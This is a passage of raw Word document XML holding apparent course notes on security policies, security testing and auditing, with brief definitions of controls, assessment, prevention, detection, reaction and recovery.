      <w:r w:rsidRPr="764D761D" w:rsidR="0713025C">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Organizations have a right and responsibility to </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="0713025C">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monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="0713025C">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the electronic communications across company hardware and resources. This includes email correspondence and social media.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="659C4E18" wp14:textId="737FEA3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="27C08FC3">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Security Procedures:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="6DD1ED83">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Security procedures specify the steps to be taken in implementing a specific policy or control, and the steps to be taken in response to a specific security incident.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="05910FF8" wp14:textId="2E7142DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="6DD1ED83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Analysis of Security Policies and Procedures</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="64A64120" wp14:textId="0638BA30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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67747EB5">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 xml:space="preserve">Controls: </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_jtIG9gqq" w:id="1779968971"/>
      <w:r w:rsidRPr="764D761D" w:rsidR="7922DBD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IN"/>
        </w:rPr>
        <w:t>Security controls, also known as security safeguards or security measures, are measures or countermeasures put in place to protect information, systems, and assets from security threats and vulnerabilities.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1779968971"/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="764DC2D3" wp14:textId="7CC3AB5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>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143FDBC7">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 xml:space="preserve">Security Tests: </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="40D19885">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Security policies and procedures can be a source of security tests; however, the security tester must keep in mind that attacks are always evolving. New attacks </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="40D19885">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emerge</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="40D19885">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and just like in any software application, new defects can become </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="40D19885">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evident</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="40D19885">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 all of which are reasons to perform security tests from the attacker mindset.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="0FCB1B4E" wp14:textId="509A323E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="4EA69EB0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Security Auditing and Its Role in Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="7B7A985D" wp14:textId="5823B34F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:bidi w:val="0"/>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pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="4EA69EB0">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security testing, a security audit does not guarantee all vulnerabilities will be found. However, the audit is one more activity in the security process to </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="4EA69EB0">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identify</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="4EA69EB0">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problem areas and </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="4EA69EB0">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indicate</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="4EA69EB0">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where remediation is needed</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="2B53BAB1" wp14:textId="4FAA22E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="4EA69EB0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Assessment:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5290D229">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 Assessments document and </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5290D229">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identify</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> potential threats, key assets, policies and procedures, and management’s tolerance for risk.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="7C8C784D" wp14:textId="201CBB64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention: </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>This extends beyond technology and includes administrative, operational, and technical controls.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="6A24EFED" wp14:textId="48216281">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Detection is how a security breach or </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ntrusion</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>identified</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5290D229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="74284CDE" wp14:textId="2EF6ACB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0890DB9A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Reaction: </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0890DB9A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Reaction time is </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0890DB9A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>greatly reduced</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0890DB9A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> with good security </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0F0F9EC7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>defense's</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0890DB9A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and detection mechanisms. While security breaches are </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0890DB9A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>bad news</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0890DB9A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, it is important to know if one has occurred. Fast reaction time is critical to minimize the exposure to the incident.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="658DBF5F" wp14:textId="0B246869">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="0890DB9A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Recovery:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="17B2A19C" wp14:textId="4959BF04">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="7578C046" w14:textId="4B7426AD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="4302A7D5" w14:textId="00B8A568">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="1B4CEE20" w14:textId="32CA144A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="5AC8541D" w14:textId="533E0EB7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="29D2A6FA" w14:textId="6772C7AD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6C8E2294">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0FC71678">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="0FC71678">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
